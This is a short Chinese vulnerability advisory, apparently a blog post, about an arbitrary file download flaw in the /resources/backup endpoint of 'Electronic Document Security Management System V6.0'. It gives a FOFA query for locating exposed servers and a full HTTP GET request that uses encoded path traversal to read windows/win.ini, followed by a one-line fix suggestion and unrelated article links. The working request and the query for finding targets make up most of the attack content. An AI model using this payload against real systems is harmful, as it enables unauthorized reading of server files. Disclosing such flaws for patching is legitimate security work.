电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js"

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本

相关推荐
智慧地球(AI·Earth)2 分钟前
Codex配置问题解析:wire_api格式不匹配导致的“Reconnecting...”循环
开发语言·人工智能·vscode·codex·claude code
小红卒8 分钟前
海康威视未授权访问漏洞 (CVE-2017-7921)复现研究
安全
Ralph_Y10 分钟前
C++虚继承
开发语言·c++
杨章隐11 分钟前
Java 解析 CDR 文件并计算图形面积的完整方案(支持 MultipartFile / 网络文件)@杨宁山
java·开发语言
霉运全滚蛋好运围着转14 分钟前
启动 Taro 4 项目报错:Error: The specified module could not be found.
前端
cxxcode17 分钟前
前端模块化发展
前端
SmartRadio19 分钟前
进一步优化CH585M的低功耗模式
c语言·开发语言·单片机·嵌入式硬件·物联网
不务正业的前端学徒21 分钟前
docker+nginx部署
前端
Renhao-Wan23 分钟前
Java 并发基石:AQS (AbstractQueuedSynchronizer)
java·开发语言
不务正业的前端学徒26 分钟前
webpack/vite配置
前端